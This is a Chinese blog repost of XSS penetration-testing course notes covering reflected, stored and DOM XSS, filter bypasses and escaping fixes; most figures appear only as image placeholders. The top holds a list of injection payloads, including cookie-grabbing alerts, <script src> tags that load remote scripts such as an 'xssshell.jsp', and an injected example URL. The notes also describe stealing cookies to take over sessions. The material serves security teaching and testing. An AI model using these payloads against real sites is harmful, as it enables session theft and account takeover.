Web渗透测试-Xss跨站脚本攻击(Cross Site Scripting)

news/2025/2/19 9:58:20/

Xss跨站脚本攻击

    • Xss通用明文 &&表单劫持
      • 跨站脚本攻击漏洞概念,
      • 漏洞原理和危害,
      • 掌握反射型、存储型XSS漏洞利用方法
    • web安全工程师-03-XSS漏洞原理与利用
  • 第一章:XSS基础
    • 1.1 XSS介绍与原理~1
    • 1.2 存储型XSS实战
    • 1.3 反射型XSS实战
    • 1.4 DOM型XSS实战
    • 1.5 XSS辅助测试工具
  • 第二章: XSS实战与防御机制绕过
    • 2.1 存储型XSS多场景实战及Bypass详解
    • 2.3 反射型XSS多场景实战及Bypass详解~1
      • payload 多次 url 编码
    • 2.4 DOM型XSS多场景实战及Bypass详解~1
  • 第三章:XSS高级

 浅谈XSS漏洞挖掘  https://mp.weixin.qq.com/s/6oT63IxXodWte3WLw-zKRw有输入的地方就试试,对可以触发XSS的地方做总结输入即输出
对用户的输入在没有进行任何过滤的情况下进行了输出。
输出报错信息的时候直接把用户输入的内容直接进行了输出。
猜想可能由于现在对信息安全的重视,涉及到业务方面的输入数据的过滤编码已经很成熟,
对一些错误信息的输出可能重视还不够大。该漏洞的触发就是在返回错误信息的时候回返回方法名,这个方法名攻击者可以自己定义,导致触发了XSS漏洞
在返回错误信息的时候回返回参数FUZZ参数触发XSS
 XSS(跨站脚本)概述
Cross-Site Scripting 简称为“CSS”,
为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。
一般XSS可以分为如下几种常见类型:1.反射性XSS;2.存储型XSS; 
3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,
在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,
导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。因此在XSS漏洞的防范上,
一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理: 输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入; 
输出转义:根据输出点的位置对输出到前端的内容进行适当转义;"'><textarea+autofocus+onfocus=alert(45)><iframe/src=JavaScriPt:alert(45)><script>alert(aming)</script><script src=”http://192.168.1.19/xssshell.jsp?v=336699″></script>
><script>alert(document.cookie)</script>
=’><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<script>alert(‘XSS’)</script>
<img src=”javascript:alert(‘XSS’)”>
<script>alert(‘Vulnerable’)</script>
<IFRAME SRC=javascript:alert(‘XSS’)></IFRAME>
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
<BODY ONLOAD=alert(‘XSS’)>
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
<SCRIPT a=”>” SRC=”http://xxxx/a.js”></SCRIPT>
<SCRIPT =”>” SRC=”http://xxxxx/a.js”></SCRIPT>
<SCRIPT a=”>” ” SRC=”http://xxxxx/a.js”></SCRIPT>
<SCRIPT “a=’>’” SRC=”http://xxxxx/a.js”></SCRIPT><img src=x onerror=alert(45)>
<svg/onload=alert(45)> 
<script>alert(45)</script>
<img/src onerror=alert(45)>
"><iframe/src=JavaScriPt:alert(45)>
<video/poster/onerror=alert(45)> 
<audio src onloadstart=alert(45)>
<meter onmouseover=alert(45)>0</meter>
<marquee onstart=alert(45)>
<select autofocus onfocus=alert(45)>
<input autofocus onfocus=alert(45)>
<keygen autofocus onfocus=alert(45)>
<textarea autofocus onfocus=alert(45)><original query>
onhwul=64 
<svg/onload=alert(45)>                 | reflected XSS Code              |
<script>alert(45)</script>             | reflected XSS Code              |
| 9  | HIGH   | XSS             | GET    | type  | <marquee onstart=alert(45)>            | reflected HTML5 XSS Code        |
| 10 | HIGH   | XSS             | GET    | type  | <meter onmouseover=alert(45)>0</meter> | reflected HTML5 XSS Code        |
| 11 | HIGH   | XSS             | GET    | type  | <audio src onloadstart=alert(45)>      | reflected HTML5 XSS Code        |
| 12 | HIGH   | XSS             | GET    | type  | "><iframe/src=JavaScriPt:alert(45)>    | reflected XSS Code              |
| 13 | HIGH   | XSS             | GET    | type  | <video/poster/onerror=alert(45)>       | reflected HTML5 XSS Code        |
| 14 | HIGH   | XSS             | GET    | type  | <img/src onerror=alert(45)>            | reflected XSS Code              |
| 15 | HIGH   | XSS             | GET    | type  | <input autofocus onfocus=alert(45)>    | reflected onfocus XSS Code      |
| 16 | HIGH   | XSS             | GET    | type  | <keygen autofocus onfocus=alert(45)>   | reflected onfocus XSS Code      |
| 17 | HIGH   | XSS             | GET    | type  | <select autofocus onfocus=alert(45)>   | reflected onfocus XSS Code      |
<textarea autofocus onfocus=alert(45)> | reflected onfocus XSS Code      |http://www.xxxx.com/tool/search.php?
title=88952634
&mod=main
&file=html
&action=index"'><textarea+autofocus+onfocus=alert(45)>
&dosubmit=1

Xss通用明文 &&表单劫持

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

在这里插入图片描述在这里插入图片描述在这里插入图片描述

web安全工程师-03-XSS漏洞原理与利用

在这里插入图片描述

在这里插入图片描述

第一章:XSS基础

1.1 XSS介绍与原理~1

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

 打cookie xss + csrf   getshell

在这里插入图片描述

 用来攻击  使用浏览器 打开这个 页面的 用户  获取cookie    正常用户/管理员 权限

在这里插入图片描述

反射型  - 非存储型 通常  xss 代码  Payload (js)  通过 get 某个参数 传入   后端 
没有经过 存储    直接反射回   用户页面 (html)上  

在这里插入图片描述

  存储型payload  存   在某一介质 (数据库、缓存、文件)用户 查看这个页面时    展示 页面  取出数据 时  执行

在这里插入图片描述

 跟反射型类似但接受者 不再是  后端程序    而是 js 拿到参数  直接  在页面 显示

在这里插入图片描述

  html 实体编码  大多数 管用白名单  发表文章  富文本  过滤掉  js代码   或者  涉及非法的属性只div  a  p b  标签    排除onError、onLoad  事件属性 只 src  黑名单 可能会绕过xss 业务场景   对症 反射  get 输入    script代码块 输出  

在这里插入图片描述

xss 流程
payload 构造
验证
修复
xss 高阶 新用法
xss持久化
xss系列

1.2 存储型XSS实战

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
被实体转义

在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
我日我自己

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
用户登录 凭证
在这里插入图片描述
换个用户登录
在这里插入图片描述
在这里插入图片描述
盗取cookie

 怎么修复 

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
看 数据库 中 可控字段
在这里插入图片描述

1.3 反射型XSS实战

在这里插入图片描述
在这里插入图片描述

通过 url 参数 传入 恶意代码

在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
value 闭合 掉

在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

反射型 修复

在这里插入图片描述
orm 模型 查询

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述 在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

刚才 访问页面 自动给 焦点 就会一直触发

在这里插入图片描述

语法
闭合
或者 属性 弹窗

在这里插入图片描述
在这里插入图片描述
html 实体转义掉

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

1.4 DOM型XSS实战

在这里插入图片描述
在这里插入图片描述
js 实现
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
dom型 不一定 是 url 传过来的 参数

在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

1.5 XSS辅助测试工具

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

绕过

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述




第二章: XSS实战与防御机制绕过

2.1 存储型XSS多场景实战及Bypass详解

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

  • 全局 配置文件
    在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
去掉空格 截断函数

在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述
反斜杠 处理

在这里插入图片描述

处理 编码问题

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
数据展示 的 类

在这里插入图片描述
在这里插入图片描述
实体转义 标签 防止 执行
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

输入 没做处理
在这里插入图片描述

输出 做了处理 没做完全
在这里插入图片描述
在这里插入图片描述

  • 修复 实体转义
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

编写 payload

在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

长度限制 添加注释

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述

注释 闭合 网页标签

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
dom节点
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

多段提交
注释 执行

多点限制 加密 编码
取值 得值 谨慎

2.3 反射型XSS多场景实战及Bypass详解~1

在这里插入图片描述

  • 插件 漏洞

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

payload 多次 url 编码

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

浏览器默认 解码一次 url编码

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2.4 DOM型XSS多场景实战及Bypass详解~1

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
存储 + DOM

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

漏洞 分析 + 挖掘

第三章:XSS高级


http://www.ppmy.cn/news/167540.html

相关文章

Win7系统IE、搜狗等浏览器首页被恶意网址qq789.com.cn劫持……

刚才&#xff0c;一位朋友的Windows7 电脑中IE、搜狗等浏览器首页被qq789.com.cn劫持&#xff0c;请我通过QQ远程协助帮忙解决。 右击朋友电脑桌面上的Internet Explorer图标&#xff0c;从弹出的菜单中选择“属性”&#xff0c;弹出的“Internet 属性”窗口是这样的&#xff1…

前端面试题汇总(四)

BAT及各大互联网公司2014前端笔试面试题–Html,Css篇 注&#xff1a;本文转载&#xff0c;可移步原文评论。 很多面试题是我自己面试BAT亲身经历碰到的。整理分享出来希望更多的前端er共同进步吧&#xff0c;不仅适用于求职者&#xff0c;对于巩固复习前端基础更是大有裨益。…

《从零开始搭建游戏服务器》Linux开发环境配置

前言&#xff1a; 之前的开发工作一直是在Windows开发环境下进行的&#xff0c;但是正真发布和外网运营势必要发布到Linux环境下&#xff0c;而且有很多服务端的工具对于Windows系统的兼容性并不是非常完善&#xff0c;就像常用的Docker容器就只支持Linux系统&#xff0c;所以…

Android drm-hwcomposer

软件环境&#xff1a;ubuntu20.04 aosp 硬件环境&#xff1a;X86 PC 模拟环境&#xff1a;在host ubuntu20.04启动支持图形(by virtio-gpu)的Android虚拟机1. 介绍 HWC 会执行以下计算&#xff1a; 1. SurfaceFlinger 向HWC 提供一个完整的层列表&#xff0c;并询问“您希望…

android安全测试框架,针对安全元件的 CTS 测试

为了提供更好的安全性,有些设备嵌入了安全元件 (SE),这是一种单独的防篡改硬件,专门用于存储加密数据。Open Mobile API 是一种标准 API,用于与设备的安全元件进行通信。Android 9 支持该 API,并提供后端实现(包括安全元件服务和 SE HAL)。 安全元件服务负责检查设备是否支…

ffmpeg源码简析(十三)ffmpeg API变更 2009-03-01—— 2017-05-09变更

Add&#xff1a;新增的Change/Rename&#xff1a;修改的Deprecate&#xff1a;过时的。以后很有可能删除。Remove&#xff1a;删除的The last version increases were: libavcodec: 2015-08-28 libavdevice: 2015-08-28 libavfilter: 2015-08-28 libavformat: 2015-08…

OA项目之我的会议(会议排座送审)

前言&#xff1a; 本篇博客是完善会议OA项目所分享的一篇博客&#xff0c;是跟上几篇博客是有关联的。 该博客分享的是OA项目中会议排座和送审的功能。 目录 前言&#xff1a; 一、会议排座插件介绍 需求分析&#xff1a; 二、具体实现 出发点&#xff1a; 流程&#xff…

基于机器学习和深度学习的推荐系统实战【图书推荐、电影推荐、音乐推荐】

推荐系统在我们日常生活中发挥着非常重要的作用,相信实际从事过推荐相关的工程项目的人或多或少都会看多《推荐系统实战》这本书,我也是读者之一,个人感觉对于推荐系统的入门来说这本书籍还是不错的资料。很多商场、大厂的推荐系统都是很复杂也是很强大的,大多是基于深度学…